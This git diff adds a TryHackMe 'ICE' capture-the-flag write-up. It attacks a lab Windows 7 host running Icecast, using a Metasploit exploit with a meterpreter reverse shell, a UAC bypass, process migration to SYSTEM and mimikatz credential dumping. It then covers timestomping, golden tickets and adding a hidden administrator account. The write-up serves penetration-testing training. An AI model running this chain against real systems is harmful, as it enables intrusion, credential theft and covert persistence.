diff --git a/TryHackMe/ICE.md b/TryHackMe/ICE.md new file mode 100644 index 0000000..2d987e5 --- /dev/null +++ b/TryHackMe/ICE.md @@ -0,0 +1,472 @@ +# TryHackMe-ICE CTF + +> Abdullah Rizwan | 09 September ,09 : 05 PM + +## NMAP + +``` +export IP=10.10.215.129 + +``` + +It is a good practice to scan all ports so we are going to use this syntax +``` +nmap -T4 -A -p- $IP + +``` + + +``` +Host is up (0.17s latency). +Not shown: 65523 closed ports +PORT STATE SERVICE VERSION +135/tcp open msrpc Microsoft Windows RPC +139/tcp open netbios-ssn Microsoft Windows netbios-ssn +445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) +3389/tcp open ssl/ms-wbt-server? +|_ssl-date: 2020-09-09T16:59:43+00:00; -8h59m59s from scanner time. +5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-server-header: Microsoft-HTTPAPI/2.0 +|_http-title: Service Unavailable +8000/tcp open http Icecast streaming media server +|_http-title: Site doesn't have a title (text/html). +49152/tcp open msrpc Microsoft Windows RPC +49153/tcp open msrpc Microsoft Windows RPC +49154/tcp open msrpc Microsoft Windows RPC +49158/tcp open msrpc Microsoft Windows RPC +49159/tcp open msrpc Microsoft Windows RPC +49161/tcp open msrpc Microsoft Windows RPC +No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). +TCP/IP fingerprint: +OS:SCAN(V=7.80%E=4%D=9/9%OT=135%CT=1%CU=32788%PV=Y%DS=2%DC=T%G=Y%TM=5F5988C +OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S%TS= +OS:7)OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M5 +OS:08NW8ST11%O6=M508ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200 +OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M508NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S +OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y% +OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD= +OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0% +OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( +OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= +OS:N%T=80%CD=Z) + +Network Distance: 2 hops + +Host script results: +|_clock-skew: mean: -7h44m58s, deviation: 2h30m00s, median: -8h59m59s +|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: , NetBIOS MAC: 02:a7:8e:88:a9:05 (unknown) +| smb-os-discovery: +| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) +| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional +| Computer name: Dark-PC +| NetBIOS computer name: DARK-PC\x00 +| Workgroup: WORKGROUP\x00 +|_ System time: 2020-09-09T11:59:35-05:00 +| smb-security-mode: +| account_used: guest +| authentication_level: user +| challenge_response: supported +|_ message_signing: disabled (dangerous, but default) +| smb2-security-mode: +| 2.02: +|_ Message signing enabled but not required +| smb2-time: +| date: 2020-09-09T16:59:35 +|_ start_date: 2020-09-09T16:11:28 + +TRACEROUTE (using port 199/tcp) +HOP RTT ADDRESS +1 177.21 ms 10.8.0.1 +2 180.01 ms 10.10.215.129 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 931.07 seconds + + +``` + +## Metaslpoit + +Now we can look for `icecast` in msfconsole and there is a vulnerability for icecast + +https://www.cvedetails.com/cve/CVE-2004-1561/ + +``` + search icecast + +Matching Modules +================ + + # Name Disclosure Date Rank Check Description + - ---- --------------- ---- ----- ----------- + 0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite + +``` + + +Use this exploit and change settings according to your `tun0` and `machine_ip`. +``` +Module options (exploit/windows/http/icecast_header): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOSTS 10.10.215.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' + RPORT 8000 yes The target port (TCP) + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 10.8.94.60 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic + + + +``` + + +``` +exploit + +[*] Started reverse TCP handler on 10.8.94.60:4444 +[*] Sending stage (176195 bytes) to 10.10.215.129 +[*] Meterpreter session 1 opened (10.8.94.60:4444 -> 10.10.215.129:49264) at 2020-09-09 22:18:29 -0400 + +meterpreter > + + +``` + +``` +getuid +Server username: Dark-PC\Dark +meterpreter > sysinfo +Computer : DARK-PC +OS : Windows 7 (6.1 Build 7601, Service Pack 1). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows + +``` +## Privilege Escalation + +Since we are not the administrator of this box we can run build module to look for privilege escalation + +``` +meterpreter > run post/multi/recon/local_exploit_suggester + +[*] 10.10.215.129 - Collecting local exploits for x86/windows... +[*] 10.10.215.129 - 34 exploit checks are being tried... +[+] 10.10.215.129 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. +nil versions are discouraged and will be deprecated in Rubygems 4 +[+] 10.10.215.129 - exploit/windows/local/ikeext_service: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. +meterpreter > + + +``` + +Now selecting the first exploit found we are going to background `ctrl+z` our session. +``` +msf5 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr +[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp +msf5 exploit(windows/local/bypassuac_eventvwr) > show options + +Module options (exploit/windows/local/bypassuac_eventvwr): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SESSION yes The session to run this module on. + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.1.6 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows x86 + + +msf5 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1 +SESSION => 1 +msf5 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.8.94.60 +LHOST => 10.8.94.60 +msf5 exploit(windows/local/bypassuac_eventvwr) > + + +``` + +When we run this exploit we will have another session created + +``` +exploit + +[*] Started reverse TCP handler on 10.8.94.60:4444 +[*] UAC is Enabled, checking level... +[+] Part of Administrators group! Continuing... +[+] UAC is set to Default +[+] BypassUAC can bypass this setting, continuing... +[*] Configuring payload and stager registry keys ... +[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe +[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute. +[*] Sending stage (176195 bytes) to 10.10.215.129 +[*] Meterpreter session 2 opened (10.8.94.60:4444 -> 10.10.215.129:49278) at 2020-09-09 22:30:01 -0400 +``` + +Now we have to see which process is running as `authoritiy` + + +``` + PID PPID Name Arch Session User Path [48/1936] + --- ---- ---- ---- ------- ---- ---- + 0 0 [System Process] + 4 0 System x64 0 + 384 3124 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe + 416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe + 500 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe + 544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe + 552 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe + 588 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe + 592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe + 604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe + 652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe + 692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe + 700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe + 708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe + 812 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe + 816 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe + 884 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe + 932 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe + 1060 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe + 1188 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe + 1296 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe + 1316 1288 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe + 1392 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe + 1420 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe + 1476 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe + 1596 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe + 1668 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe + 1708 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe + 1900 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe + 1984 1316 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe + 2132 816 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.exe + 2244 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe + 2268 816 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe + 2512 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe + 2572 1984 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe + 2676 816 rundll32.exe x64 1 Dark-PC\Dark C:\Windows\System32\rundll32.exe + 2724 2676 dinotify.exe x64 1 Dark-PC\Dark C:\Windows\System32\dinotify.exe + 3680 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe + 3728 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe + + +``` + + +Here `spoolsv.exe` is ruuning as authority and we can take advantage of that by `migrating` into that process. + + + +``` +migrate -N spoolsv.exe +[*] Migrating from 384 to 1392... +[*] Migration completed successfully. +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > + +``` + + + +## Kiwi + +``` +meterpreter > load kiwi +Loading extension kiwi... + .#####. mimikatz 2.2.0 20191125 (x64/windows) + .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) + ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) + ## \ / ## > http://blog.gentilkiwi.com/mimikatz + '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) + '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ + +Success. + + +Kiwi Commands +============= + + Command Description + ------- ----------- + creds_all Retrieve all credentials (parsed) + creds_kerberos Retrieve Kerberos creds (parsed) + creds_msv Retrieve LM/NTLM creds (parsed) + creds_ssp Retrieve SSP creds + creds_tspkg Retrieve TsPkg creds (parsed) + creds_wdigest Retrieve WDigest creds (parsed) + dcsync Retrieve user account information via DCSync (unparsed) + dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync + golden_ticket_create Create a golden kerberos ticket + kerberos_ticket_list List all kerberos tickets (unparsed) + kerberos_ticket_purge Purge any in-use kerberos tickets + kerberos_ticket_use Use a kerberos ticket + kiwi_cmd Execute an arbitary mimikatz command (unparsed) + lsa_dump_sam Dump LSA SAM (unparsed) + lsa_dump_secrets Dump LSA secrets (unparsed) + password_change Change the password/hash of a user + wifi_list List wifi profiles/creds for the current user + wifi_list_shared List shared wifi profiles/creds (requires SYSTEM) + + +``` + +Now using `creds_all` to retreive the password in parsed form + +``` +eterpreter > creds_all +[+] Running as SYSTEM +[*] Retrieving all credentials +msv credentials +=============== + +Username Domain LM NTLM SHA1 +-------- ------ -- ---- ---- +Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb + +wdigest credentials +=================== + +Username Domain Password +-------- ------ -------- +(null) (null) (null) +DARK-PC$ WORKGROUP (null) +Dark Dark-PC Password01! + +tspkg credentials +================= + +Username Domain Password +-------- ------ -------- +Dark Dark-PC Password01! + +kerberos credentials +==================== + +Username Domain Password +-------- ------ -------- +(null) (null) (null) +Dark Dark-PC Password01! +dark-pc$ WORKGROUP (null) + +``` + + + +While more useful when interacting with a machine being used, what command allows us to watch the remote user's desktop in real time? + +``` +screenshare +``` + +How about if we wanted to record from a microphone attached to the system? + +``` +record mic +``` + + +To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don't ever do this on a pentest unless you're explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact. + +``` +timestomp +``` + + + +Mimikatz allows us to create what's called a `golden ticket`, allowing us to authenticate anywhere with ease. What command allows us to do this? + +Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain. + + +``` +golden_ticket_create +``` +# Extra + +## RDP + +If you want to remotely connect to the box and use it's GUI you can do that by checking if `rdp` is enabled on that box + + +``` +meterpreter > run post/windows/manage/enable_rdp + +[*] Enabling Remote Desktop +[*] RDP is already enabled +[*] Setting Terminal Services service startup mode +[*] The Terminal Services service is not set to auto, changing it to auto ... +[*] Opening port in local firewall if necessary +[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200909230409_default_10.10.215.129_host.windows.cle_189827.txt + +``` + +If you want you can add a new user as long as your `Authority` + +``` +terpreter > run getgui -u arz -p Password01! + +[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp. +[!] Example: run post/windows/manage/enable_rdp OPTION=value [...] +[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator +[*] Carlos Perez carlos_perez@darkoperator.com +[*] Setting user account for logon +[*] Adding User: arz with Password: Password01! +[*] Hiding user from Windows Login screen +[*] Adding User: arz to local group 'Remote Desktop Users' +[*] Adding User: arz to local group 'Administrators' +[*] You can now login with the created user +[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20200909.1126.rc + +``` +Since `Dark` is logged in for now this would mess up the box if we try to login with a new user. + +``` +root@kali:~# rdesktop -u dark -p Password01! 10.10.215.129 +Autoselecting keyboard map 'en-us' from locale +Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate. +Failed to initialize NLA, do you have correct Kerberos TGT initialized ? +Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate. +Connection established using SSL. +Protocol(warning): process_pdu_logon(), Unhandled login infotype 1 +Clipboard(error): xclip_handle_SelectionNotify(), unable to find a textual target to satisfy RDP clipboard text request + +``` + + + \ No newline at end of file